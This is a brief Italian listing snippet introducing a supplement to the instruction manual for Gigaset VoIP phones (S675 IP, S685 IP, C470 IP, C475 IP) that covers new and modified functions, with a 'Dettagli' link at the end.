Funzioni nuove e modificate Gigaset S675 IP, S685 IP, C470 IP, C475 IP: Funzioni nuove e modificate Questo documento integra il manuale di istruzioni dei telefoni VoIP Gigaset: Gigaset C470 IP, Gigaset C475 IP, Gigaset S675 IP e

Dettagli